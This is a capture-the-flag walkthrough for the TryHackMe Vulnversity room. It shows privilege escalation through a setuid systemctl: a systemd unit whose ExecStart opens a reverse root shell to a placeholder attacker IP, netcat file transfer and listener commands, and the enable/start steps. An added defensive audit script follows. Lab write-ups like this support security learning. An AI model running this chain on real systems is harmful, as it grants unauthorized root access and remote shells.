Vulnversity (Privilege Escalation)
Misconfigured Permissions — sudo/SUID
Practice box: https://tryhackme.com/room/vulnversity
0. Prepare your payload: root.service
root.service
[Unit]
Description=roooooooooot
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1'
[Install]
WantedBy=multi-user.target
1. Find files/directories that are writable
find . -maxdepth 2 -type f -writable
or
find . -maxdepth 2 -type d -writable
2. Transfer the payload (there might be other ways)
Start a listener on the target to receive the file
nc -vl 44444 > root.service
Send the file to the target
nc -n TargetIP 44444 < root.service
3. Start listening on port 9999
nc -lvnp 9999
4. Execute the payload (assuming the file is under /var/tmp)
/bin/systemctl enable /var/tmp/root.service
Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /var/tmp/root.service
Created symlink from /etc/systemd/system/root.service to /var/tmp/root.service
/bin/systemctl start root
5. The listener on port 9999 receives the root shell
6. Alternative solution: https://gtfobins.github.io/gtfobins/systemctl/
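Seen from the defender's side, the steps above leave two things to audit: a systemctl binary that an unprivileged user can run with root privileges (the SUID case in the title), and unit symlinks under /etc/systemd/system that resolve into a writable location such as /var/tmp. The script below is an added example, not part of the original write-up; the function names and the default list of trusted unit directories are assumptions to adjust per distribution.

```shell
#!/bin/sh
# Added defensive example, not part of the original write-up.

# List *.service symlinks under a unit directory whose resolved target is
# outside the trusted unit locations.
#   $1      unit directory (default: /etc/systemd/system)
#   $2...   trusted prefixes (defaults below are an assumption; adjust per distro)
find_foreign_units() {
    unit_dir="${1:-/etc/systemd/system}"
    [ $# -gt 0 ] && shift
    [ $# -gt 0 ] || set -- /etc/systemd /usr/lib/systemd /lib/systemd /run/systemd
    [ -d "$unit_dir" ] || return 0
    find "$unit_dir" -type l -name '*.service' 2>/dev/null |
    while IFS= read -r link; do
        target=$(readlink -f "$link" 2>/dev/null) || continue
        [ "$target" = /dev/null ] && continue   # masked unit, not a finding
        trusted=no
        for prefix in "$@"; do
            case "$target" in "$prefix"/*) trusted=yes ;; esac
        done
        [ "$trusted" = yes ] || printf '%s -> %s\n' "$link" "$target"
    done
    return 0
}

# Succeed (and print a finding) when the given file has the setuid bit set.
is_setuid() {
    [ -u "$1" ] && printf 'setuid bit set: %s\n' "$1"
}

# Audit the local host.
find_foreign_units
is_setuid "$(command -v systemctl 2>/dev/null || echo /bin/systemctl)" ||
    echo "systemctl is not setuid"
```

Any line printed by find_foreign_units on a host in the state shown in step 4 would name the two root.service symlinks that point into /var/tmp.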
Expand Knowledge
https://stackoverflow.com/questions/2491985/find-all-writable-files-in-the-current-directory
https://www.maketecheasier.com/netcat-transfer-files-between-linux-computers/